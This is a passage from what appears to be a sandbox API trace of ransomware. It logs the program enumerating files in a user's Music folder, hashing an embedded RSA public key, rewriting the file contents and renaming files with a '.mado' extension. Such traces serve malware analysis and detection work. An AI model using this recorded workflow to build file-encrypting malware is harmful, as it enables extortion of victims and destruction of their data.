lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe3a0 | out: hHeap=0x2c0000) returned 1 [0204.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0204.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.583] GetCurrentThreadId () returned 0x600 [0204.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6eb80 [0204.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b71e10 [0204.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0204.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0204.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0204.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ed90 [0204.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.583] GetCurrentThreadId () returned 0x600 [0204.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0204.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0204.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6efa0 [0204.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3a48 [0204.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ec88 [0204.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe3a0 [0204.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0204.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0204.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0204.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0204.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0204.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0204.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe358 [0204.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0204.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0204.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0204.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0204.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe370 [0204.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0204.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0204.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0204.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe340 [0204.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0204.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe3b8 [0204.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0204.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0204.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe388 [0204.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe3d0 [0204.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0204.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0204.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0204.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe358 | out: hHeap=0x2c0000) returned 1 [0204.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe358 [0204.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c8d0 [0204.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe3a0 | out: hHeap=0x2c0000) returned 1 [0204.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b68078 [0204.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe3d0 | out: hHeap=0x2c0000) returned 1 [0204.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x3b74b68 [0204.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0204.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b682a8 [0204.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0204.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b683c0 [0204.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe358 | out: hHeap=0x2c0000) returned 1 [0204.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74d80 [0204.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68078 | out: hHeap=0x2c0000) returned 1 [0204.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ee98 [0204.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0204.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6efa0 | out: hHeap=0x2c0000) returned 1 [0204.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ee98 | out: hHeap=0x2c0000) returned 1 [0204.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0204.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b683c0 | out: hHeap=0x2c0000) returned 1 [0204.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74d80 | out: hHeap=0x2c0000) returned 1 [0204.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b682a8 | out: hHeap=0x2c0000) returned 1 [0204.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0204.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe388 | out: hHeap=0x2c0000) returned 1 [0204.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0204.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe3b8 | out: hHeap=0x2c0000) returned 1 [0204.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe370 | out: hHeap=0x2c0000) returned 1 [0204.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe340 | out: hHeap=0x2c0000) returned 1 [0204.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0204.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0204.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ed90 | out: hHeap=0x2c0000) returned 1 [0204.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe328 | out: hHeap=0x2c0000) returned 1 [0204.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b80978 | out: hHeap=0x2c0000) returned 1 [0204.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec88 | out: hHeap=0x2c0000) returned 1 [0204.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0204.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68190 | out: hHeap=0x2c0000) returned 1 [0204.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0204.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0204.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0204.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.586] WriteFile (in: hFile=0x63c, lpBuffer=0x3b81690*, nNumberOfBytesToWrite=0xcd07, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b81690*, lpNumberOfBytesWritten=0x39cfb14*=0xcd07, lpOverlapped=0x0) returned 1 [0204.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81690 | out: hHeap=0x2c0000) returned 1 [0204.587] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xcd0c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.587] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0204.587] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0204.587] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74b68 [0204.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74b68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0204.587] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b74f98 [0204.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0204.587] WriteFile (in: hFile=0x63c, lpBuffer=0x3b74f98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b74f98*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0204.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74f98 | out: hHeap=0x2c0000) returned 1 [0204.587] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.587] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.587] CloseHandle (hObject=0x63c) returned 1 [0204.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2b20 [0204.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x3b74b68 [0204.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c2b20 | out: hHeap=0x2c0000) returned 1 [0204.589] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\odacb09i75Hk.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\odacb09i75hk.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\odacb09i75Hk.m4a.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\odacb09i75hk.m4a.mado")) returned 1 [0204.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.589] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326020 | out: hHeap=0x2c0000) returned 1 [0204.590] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fc7ef20, ftCreationTime.dwHighDateTime=0x1d5e823, ftLastAccessTime.dwLowDateTime=0x98748c90, ftLastAccessTime.dwHighDateTime=0x1d5de07, ftLastWriteTime.dwLowDateTime=0x98748c90, ftLastWriteTime.dwHighDateTime=0x1d5de07, nFileSizeHigh=0x0, nFileSizeLow=0x953a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OHeX4.wav", cAlternateFileName="")) returned 1 [0204.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0204.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x326020 [0204.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0204.590] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OHeX4.wav") returned=".wav" [0204.590] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OHeX4.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ohex4.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.591] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=38202) returned 1 [0204.591] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.593] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x9514, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.593] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.595] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.595] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x953a, lpOverlapped=0x0) returned 1 [0204.595] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0204.595] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.595] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.595] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.596] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.596] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.596] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.597] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.597] GetLastError () returned 0x0 [0204.597] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.597] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.597] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.597] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.597] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9540) returned 0x3b81690 [0204.597] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0204.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0204.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0204.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0204.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b80978 [0204.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe328 [0204.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b809c0 [0204.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe340 [0204.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe370 [0204.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe3b8 [0204.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe388 [0204.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0204.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b6bb80 [0204.598] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6bb80, Size=0x218) returned 0x3b7c8d0 [0204.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74b68 [0204.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe370 | out: hHeap=0x2c0000) returned 1 [0204.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe388 | out: hHeap=0x2c0000) returned 1 [0204.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe3b8 | out: hHeap=0x2c0000) returned 1 [0204.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe3b8 [0204.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0204.598] RtlAllocateHeap 